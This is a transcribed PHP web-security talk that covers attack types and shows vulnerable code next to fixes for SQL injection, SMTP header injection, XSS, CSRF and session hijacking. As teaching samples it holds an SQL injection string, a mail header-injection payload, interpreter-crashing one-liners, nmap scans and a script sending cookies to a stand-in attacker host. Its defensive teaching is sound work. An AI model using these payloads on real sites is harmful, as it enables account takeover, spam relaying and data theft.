PHP Security
Ricardo Striquer Soares (ricardophp)
programabrasil.blogspot.com
Attack techniques
        Spam / Phishing scams
        Exploits / Backdoors
        Botnets
        Packet sniffing
        Scanning / Port scanning
        Social engineering
        Spyware / Keyloggers / Screenloggers
        DoS / DDoS
        DNS poisoning
        Brute force
http://en.wikipedia.org/wiki/Exploit_%28computer_security%29
Spam
       "It is worrisome that ... when
       transactions faced a stealthy
       attack, 61% of attacks were
       successful."
                    QUT researcher Mohammed AlZomai
                               isi.qut.edu.au (Australia)

  http://www.sciencedaily.com/releases/2007/11/071107091540.htm
Spyware, Keyloggers
   and Screenloggers

http://en.wikipedia.org/wiki/Spyware
Botnets
http://en.wikipedia.org/wiki/Botnets
Brute Force
while ( ! ( succeed = try() ) );




         http://en.wikipedia.org/wiki/Brute_force_attack
Exploits
      and Bugs
 php -r 'gettext(str_repeat("A",8476509));'
 (PHP 5.2.5)

 $a=str_repeat("A", 65535);
 $b=1;
 $c=str_repeat("A", 65535);
 chunk_split($a,$b,$c);
 (PHP 5.2.1)

 Both are bugs in the interpreter itself, not in application code: the only
 defence against this class is keeping PHP patched.

http://en.wikipedia.org/wiki/Exploit_%28computer_security%29
With all of this ...
Scanning
and Port scanning
nmap -v -sS    (TCP SYN scan)
nmap -v -P0    (zero: skip host discovery; newer nmap spells this -Pn)
nmap -v -sV    (service/version detection; example output below)

PORT     STATE   SERVICE   VERSION
21/tcp   open    ftp       vsFTPd 2.0.4
22/tcp   open    ssh       OpenSSH 4.2p1 (protocol 2.0)
25/tcp   open    smtp      qmail smtpd
80/tcp   open    http      Apache httpd 1.3.34 ((Unix) PHP/4.4.2)


                    http://en.wikipedia.org/wiki/Nmap
Social
        Engineering

        "I'm returning a technical-support
        call and ..."


        "I'm running a customer
        satisfaction survey ..."


http://en.wikipedia.org/wiki/Social_engineering_%28security%29
DNS Poisoning




   http://en.wikipedia.org/wiki/Dns_poisoning
DoS / DDoS
Denial of Service / Distributed DoS

Techniques
  ICMP floods => www.powertech.no/smurf
  Teardrop => OS upgrade
  Peer-to-peer => PI*
  Application-level floods => PI*
  Nuke => OS upgrade

         http://en.wikipedia.org/wiki/Denial-of-service_attack
Pointers

           www.securityfocus.com

           thedailywtf.com

           www.istf.com.br

           www.owasp.org
Yesterday's news ...
Apple fixes 45 flaws in Mac OS X
http://info.abril.com.br/aberto/infonews/032007/14032007-10.shl


Trojan horse steals data for sale on the web
http://info.abril.com.br/aberto/infonews/032007/22032007-10.shl


Mozilla fixes new Firefox flaw
http://info.abril.com.br/aberto/infonews/032007/21032007-24.shl


IE7 flaw makes phishing attacks easier
http://info.abril.com.br/aberto/infonews/032007/15032007-8.shl
Eight out of ten
websites are
           insecure.
There was once a story about
four people,
Everybody, Somebody,
Anybody and Nobody
...
"... There was an important job to be
     done and Everybody was sure that
   Somebody would do it. Anybody could have
   done it, but Nobody did it. Now when
Somebody got angry about that, because it was
Everybody's job, Everybody thought
     that Anybody should have done it, but
  Nobody realised that Everybody wouldn't
                 do it. ..."
... In the end
Everybody blamed
Somebody when
Nobody did what
Anybody
could have done!

Text from the Security
Office of the
US Department
of Commerce
Security is a
cultural factor; it is
a duty and
everybody's
responsibility!
What should a hosting
partner do?
Access control

Update policy

Use SPF (Sender Policy Framework)

IDS (Intrusion Detection System)


              http://www.antispam.br/admin/spf/
              http://www.rnp.br/newsgen/9909/ids.html
Interesting projects
 - Google Code Search
   Find flaws in open-source systems        http://code.google.com/

 - Hardened Linux / OpenBSD
   Identify configuration patterns          http://hardenedlinux.sourceforge.net/

 - Hardened PHP
   Deploy it                                http://www.hardened-php.net/

 - GreenSQL
   Deploy it                                http://www.greensql.net/
What can we
programmers
do?
Code problems
 Injections
 Session hijacking
 XSS
 CSRF or XSRF
Injections
    What is an injection?

    Most popular injections:
      SQL and SMTP




http://en.wikipedia.org/wiki/Code_injection
http://en.wikipedia.org/wiki/SQL_injection
Injections - SQL (1/3)
Honest input:

$_GET["login"] = "mayke";

$db = new db();
$db->SQL = '
   SELECT *
   FROM user
   WHERE login="'.$_GET["login"].'";
';
$db->Execute();
Injections - SQL (2/3)
Injected input (the quote closes the literal; the rest is parsed as SQL and the
WHERE clause is always true):

$_GET["login"] = 'N" OR TRUE OR login="NONE';

$db = new db();
$db->SQL = '
   SELECT *
   FROM user
   WHERE login="'.$_GET["login"].'";
';
/* resulting SQL: SELECT * FROM user WHERE login="N" OR TRUE OR login="NONE"; */
$db->Execute();
Injections - SQL (3/3)
if ($db->QuantidadeResultados) {
   echo "It worked!";
}

Once a non-zero result count confirms the payload worked, the attacker moves
on to further statements with other input:

if ($db->QuantidadeResultados) {
   $db->SQL = '
      /* New command with other input */
   ';
}
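As an added example (not code from the slides), the string-built query of the three slides above next to a prepared statement, run against an in-memory SQLite table. The slides' `db` class is a stand-in, so this uses PDO; the table, its rows and the payload are constructed here, and the quoting is single-quote style so that it runs on SQLite (the prepared-statement half is identical on MySQL).

```php
<?php
// Added example: the slide's string-built query next to a prepared statement.
// Table, rows and payload are constructed for the demo (PDO + SQLite in memory).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, login TEXT NOT NULL, pass TEXT NOT NULL)');
$pdo->exec("INSERT INTO user (login, pass) VALUES ('mayke', 'secret1'), ('admin', 'secret2')");

// Vulnerable (what the slides do): the login is spliced into the SQL text, so a
// quote character inside it ends the literal and the remainder is parsed as SQL.
function findUserVulnerable(PDO $pdo, string $login): array
{
    $sql = "SELECT * FROM user WHERE login='" . $login . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the login travels as a bound parameter. The SQL text is fixed at
// prepare time, so whatever the client sends can only ever be a value.
function findUserSafe(PDO $pdo, string $login): array
{
    $stmt = $pdo->prepare('SELECT * FROM user WHERE login = :login');
    $stmt->execute([':login' => $login]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The slide's payload adapted to single quotes; "1=1" is the portable spelling
// of its "OR TRUE". In the vulnerable function the SQL becomes:
//   SELECT * FROM user WHERE login='N' OR 1=1 OR login='NONE'
$payload = "N' OR 1=1 OR login='NONE";

printf("vulnerable, honest input 'mayke': %d row(s)\n", count(findUserVulnerable($pdo, 'mayke')));
printf("vulnerable, payload             : %d row(s)\n", count(findUserVulnerable($pdo, $payload)));
printf("prepared,   payload             : %d row(s)\n", count(findUserSafe($pdo, $payload)));
```

With the payload, the vulnerable query returns every user in the table while the prepared one returns none, so the "result count is non-zero" signal from slide 3/3 never fires. Escaping functions such as `$pdo->quote()` are a weaker second choice: they have to match the server's charset and quoting rules, whereas a bound parameter is never parsed as SQL at all.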
Injections - SMTP (1/4)
Honest input:

$_POST["Para"] = "destin@tario.com";
$_POST["Assunto"] = "Spammer attack";
$_POST["Mensagem"] = "They attacked our site!";

mail(
   $_POST["Para"],
   $_POST["Assunto"],
   $_POST["Mensagem"]
);
Injections - SMTP (2/4)
Trace of the honest message being delivered:

      Destination domain: tario.com
      Identifying available MTAs
      Selected server: mx.tario.com
      Socket connection established!
      R: 220 mx01.tario.com ESMTP
      S: 35 bytes
      T: 0.41055202484131 sec

      W: EHLO lucremais.com
      S: 21 bytes
      R: 250-mx01.tario.com
      S: 29 bytes
      R: 250-PIPELINING
      S: 14 bytes
      R: 250-8BITMIME
      S: 12 bytes
      R: 250-SIZE 30000000
      S: 17 bytes
      R: 250 AUTH LOGIN PLAIN CRAM-MD5
      S: 29 bytes
      T: 0.053061962127686 sec

      W: MAIL FROM: <script@site.com>
      S: 28 bytes
      R: 250 ok
      S: 6 bytes
      T: 0.81833100318909 sec

      W: RCPT TO: <destin@tario.com>
      S: 36 bytes
      R: 250 ok
      S: 6 bytes
      T: 0.043802976608276 sec

      W: DATA
      S: 4 bytes
      R: 354 go ahead
      S: 12 bytes
      T: 0.082557916641235 sec

      W: MIME-Version: 1.0
      X-SenderEngineVersion: 1.0
      X-SenderEngineName: Ideias Pontual - iMail
      Return-path: NomeFrom <script@site.com>
      Content-Type: text/plain;
           charset=ISO-8859-1
      Reply-to: NomeFrom <script@site.com>
      Date: Sat, 21 Jul 2007 13:53:15 -0300
      From: NomeFrom <script@site.com>
      To: NomeTo <destin@tario.com>
      Subject: Teste de envio texto!

      Teste
      .
      S: 379 bytes
      R: 250 ok 1185036797 qp 31968
      S: 26 bytes
      T: 0.20024585723877 sec

      W: QUIT
      S: 4 bytes
      R: 221 mx01.tario.com
      S: 29 bytes
      T: 0.044206857681274 sec

      Total send time: 1.6655600070953 sec

      W = command written; R = response; S = size of the text; T = seconds between the write and the read
Injections - SMTP (3/4)
Injected input. The value is shown as it travels in the POST body, with line
feeds URL-encoded as %0A; PHP decodes them into real line feeds before the
script ever sees $_POST["Para"]:

$_POST["Para"] = "haxor@attack.com%0ASubject:Mwahahaha%0ABcc:target@nothappy.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0A<u>HTML%20Message.</u>%0A%0A--frog%0AContent-Type:text/html;name=Security.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition:attachment%0A%0A<u>HTML%20File</u>%0A%0A--frog--%0A";
$_POST["Assunto"] = "Spammer attack";
$_POST["Mensagem"] = "They attacked our site!";

mail(
   $_POST["Para"],
   $_POST["Assunto"],
   $_POST["Mensagem"]
);
Injections - SMTP (4/4)
Message as intended:

      From: script@site.com
      Subject: Spammer attack
      To: destin@tario.com

      They attacked our site!
      .

Message as actually handed to the MTA. Every line feed in the "To" value
starts a new header line, so the attacker now owns the header block: an extra
recipient via Bcc, a second Subject, and a multipart HTML body with an
attachment, followed by the original text:

      From: script@site.com
      Subject: Spammer attack
      To: haxor@attack.com
      Subject:Mwahahaha
      Bcc:target@nothappy.com
      Content-Type:multipart/mixed;
      boundary=frog;
      --frog
      Content-Type:text/html

      <u>HTML Message.</u>

      --frog
      Content-Type:text/html;name=Security.html;
      Content-Transfer-Encoding:8bit
      Content-Disposition: attachment

      <u>HTML File</u>

      --frog--

      They attacked our site!

      .
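As an added example (not code from the slides), what the injected "Para" value from slide 3/4 does to the header block, next to the checks that keep it away from `mail()`. The payload is the slide's own; the helper names and the honest inputs are this example's.

```php
<?php
// Added example: the MTA's view of the injected "To" value, and the validation
// that refuses it. Payload from the slide; helper names are this example's own.

// As it travels in the POST body (URL-encoded). PHP decodes it into $_POST, so
// the script receives real line feeds; urldecode() reproduces that here.
$wire = 'haxor@attack.com%0ASubject:Mwahahaha%0ABcc:target@nothappy.com'
      . '%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog'
      . '%0AContent-Type:text/html%0A%0A<u>HTML%20Message.</u>%0A%0A--frog'
      . '%0AContent-Type:text/html;name=Security.html;%0AContent-Transfer-Encoding:8bit'
      . '%0AContent-Disposition:attachment%0A%0A<u>HTML%20File</u>%0A%0A--frog--%0A';
$para = urldecode($wire);

// Simulates the MTA: the value lands after "To: ", each embedded line break
// starts a new header line, and the first blank line ends the header block.
function headerNamesSeenByMta(string $toValue): array
{
    $names = [];
    foreach (preg_split('/\r\n|\r|\n/', 'To: ' . $toValue) as $line) {
        if ($line === '') {
            break; // blank line: headers are over, the body begins
        }
        if (preg_match('/^([A-Za-z][A-Za-z0-9-]*):/', $line, $m)) {
            $names[] = $m[1];
        }
    }
    return $names;
}

// Rule 1: a header field may not contain CR, LF or NUL, and RFC 5322 caps a
// line at 998 octets. The request is refused, not "cleaned": a payload with
// its line breaks stripped is still an attack attempt worth logging.
function isSafeHeaderField(string $value, int $maxLen = 998): bool
{
    return strlen($value) <= $maxLen && preg_match('/[\r\n\0]/', $value) === 0;
}

// Rule 2: a recipient must be exactly one syntactically valid address.
// FILTER_VALIDATE_EMAIL rejects the line breaks as well; the explicit check
// stays so that the subject field gets the same treatment.
function cleanRecipient(string $value): ?string
{
    if (!isSafeHeaderField($value)) {
        return null;
    }
    $email = filter_var($value, FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

// Gate in front of mail(): returns the validated arguments, or null to refuse.
function validateMailInput(string $to, string $subject, string $body): ?array
{
    $to = cleanRecipient($to);
    if ($to === null || !isSafeHeaderField($subject)) {
        return null;
    }
    // The body may contain line breaks; only header fields are line-sensitive.
    return ['to' => $to, 'subject' => $subject, 'body' => $body];
}

echo 'headers the MTA would see: ', implode(', ', headerNamesSeenByMta($para)), "\n";
$honest = validateMailInput('destin@tario.com', 'Spammer attack', "They attacked our site!\nSecond line.");
$forged = validateMailInput($para, 'Spammer attack', 'They attacked our site!');
echo 'honest input : ', $honest !== null ? 'accepted, safe to pass to mail()' : 'rejected', "\n";
echo 'forged input : ', $forged !== null ? 'accepted' : 'rejected', "\n";
```

For the slide's payload the first line prints `To, Subject, Bcc, Content-Type, Content-Type`: five header lines out of one form field. The validated honest input is the only one that reaches `mail()`; the fourth `additional_headers` argument of `mail()` (not used on the slides) needs the same CR/LF check on every value that goes into it.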
Session Hijacking

Session fixation (a session id planted through a bookmarked or mailed link)

Sidejacking (sniffing the session cookie off the wire)

XSS and CSRF (stealing or replaying the cookie from inside the browser)




             http://en.wikipedia.org/wiki/Session_hijacking
XSS
 Cross-Site Scripting

 Also referred to as CSS (not to be confused with Cascading Style Sheets)

 A stored payload does not even need JavaScript to deface the page:

                       $_POST["msg"] =
                       '<h4><font color=red>This
                       site has been
                       hacked!</font></h4>';


         http://en.wikipedia.org/wiki/Cross_site_scripting
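As an added example (not code from the slides), the stored payload above rendered raw and rendered through an encoder, plus the URL case that encoding alone does not cover. The `$_POST["msg"]` value is constructed here (the slide's defacement with a cookie-stealing script appended); the function names are this example's own.

```php
<?php
// Added example: the slide's stored-XSS payload rendered raw and rendered
// through an encoder for each output context. Names are this example's own.

// Encoder for HTML text and attribute values. ENT_QUOTES covers both quote
// characters, so the result is also safe inside a quoted attribute.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed $_POST["msg"]: the slide's defacement plus a script tag.
$msg = '<h4><font color=red>This site has been hacked!</font></h4>'
     . '<script>document.location="http://www.hacker.com/?"+document.cookie</script>';

// Vulnerable: stored input echoed straight back into the page.
function renderVulnerable(string $msg): string
{
    return '<div class="msg">' . $msg . '</div>';
}

// Fixed for HTML text context: the markup arrives as &lt;script&gt;, inert.
function renderSafe(string $msg): string
{
    return '<div class="msg">' . e($msg) . '</div>';
}

// URL context needs more than encoding: "javascript:" survives e() untouched
// and still executes on click, so the scheme is allow-listed before output.
function renderLink(string $url, string $label): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        $url = '#';
    }
    return '<a href="' . e($url) . '">' . e($label) . '</a>';
}

// Did a script tag survive into the output?
function containsLiveScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

echo renderVulnerable($msg), "\n";
echo renderSafe($msg), "\n";
echo renderLink('javascript:alert(document.cookie)', 'Click here'), "\n";
echo renderLink('https://example.org/?q="><script>', 'Search'), "\n";
echo 'raw output contains a script tag     : ', containsLiveScript(renderVulnerable($msg)) ? 'yes' : 'no', "\n";
echo 'encoded output contains a script tag : ', containsLiveScript(renderSafe($msg)) ? 'yes' : 'no', "\n";
```

Encoding belongs at the output sink, chosen per context (HTML text, attribute, URL, JavaScript), not at input time: the same stored string may be written into several contexts, and stripping tags on the way in both mangles legitimate text and misses the attribute and URL cases.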
CSRF (or XSRF)
 Cross-Site Request Forgery

 The script below is the cookie-stealing payload an XSS delivers; CSRF is the
 complementary attack, in which the victim's browser is made to send a request
 (a hidden form post, an image URL) that carries the victim's session cookie
 automatically, without the attacker ever reading it.

<script>
 window.location=
 'http://www.hacker.com?' +
 document.cookie
</script>


         http://en.wikipedia.org/wiki/Cross-site_request_forgery
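As an added example (not code from the slides) covering both the Session Hijacking slide and this one: session cookie flags that blunt fixation, sidejacking and the `document.cookie` script above, a fresh session id on login, and a per-session CSRF token checked in constant time. The function names are this example's own; it assumes PHP 7.3 or later (array form of `session_set_cookie_params`) and runs from the CLI, where the session store is local and no cookie is actually sent.

```php
<?php
// Added example for the Session Hijacking and CSRF slides: cookie hardening,
// a new session id on login, and a per-session CSRF token. Names are this
// example's own; it runs from the CLI (local session store, no real cookie).

function hardenSession(): void
{
    // Fixation: strict mode makes PHP refuse a session id it did not issue,
    // so an id planted through a bookmarked or mailed link is never adopted.
    ini_set('session.use_strict_mode', '1');
    // Ids travel only in cookies, never in URLs (no leak through Referer).
    ini_set('session.use_only_cookies', '1');
    // HttpOnly: document.cookie (the script on the CSRF slide) cannot read it.
    // Secure: sidejacking on plain HTTP sees no cookie at all.
    // SameSite=Lax: cross-site POSTs from an attacker's page do not carry it.
    session_set_cookie_params([
        'lifetime' => 0, 'path' => '/', 'domain' => '',
        'secure' => true, 'httponly' => true, 'samesite' => 'Lax',
    ]);
}

function loginUser(int $userId): void
{
    // A fresh id on every privilege change discards whatever id the attacker
    // knew; delete_old_session=true so the old id cannot be reused either.
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    $_SESSION['csrf'] = bin2hex(random_bytes(32)); // 256-bit token from the CSPRNG
}

// Emitted into every state-changing form. The attacker's page cannot read it
// (same-origin policy), so a forged request cannot include it.
function csrfField(): string
{
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8') . '">';
}

// Checked before acting on any POST. hash_equals() is constant-time, so the
// comparison leaks nothing about the token through timing.
function csrfTokenIsValid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $submitted);
}

hardenSession();
session_start();
$before = session_id();
loginUser(42);
echo 'session id changed on login : ', session_id() !== $before ? 'yes' : 'no', "\n";
echo 'form field                  : ', csrfField(), "\n";
echo 'request with the token      : ', csrfTokenIsValid($_SESSION['csrf']) ? 'accepted' : 'rejected', "\n";
echo 'forged request, no token    : ', csrfTokenIsValid(null) ? 'accepted' : 'rejected', "\n";
echo 'forged request, wrong token : ', csrfTokenIsValid(str_repeat('0', 64)) ? 'accepted' : 'rejected', "\n";
```

The four lines of output read yes / accepted / rejected / rejected. SameSite=Lax is a useful default but not a substitute for the token: GET requests that change state still go through from a cross-site link, which is one more reason to keep state changes on POST.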
*IMPORTANT*
Every one of these can carry data the client chose; none of it is trusted
until it has been validated:

$_GET   $_POST   $_COOKIE   $_SERVER   $_ENV   $_FILES
Security is a
cultural factor; it is
a duty and
everybody's
responsibility!
The end!

Thanks                Useful sites
ProPHP                www.php.net/security
Tempo Real            www.php-security.org
idéias.ual            blog.php-security.org
                      phpsec.org
                      www.phpsecure.info
                      programabrasil.blogspot.com
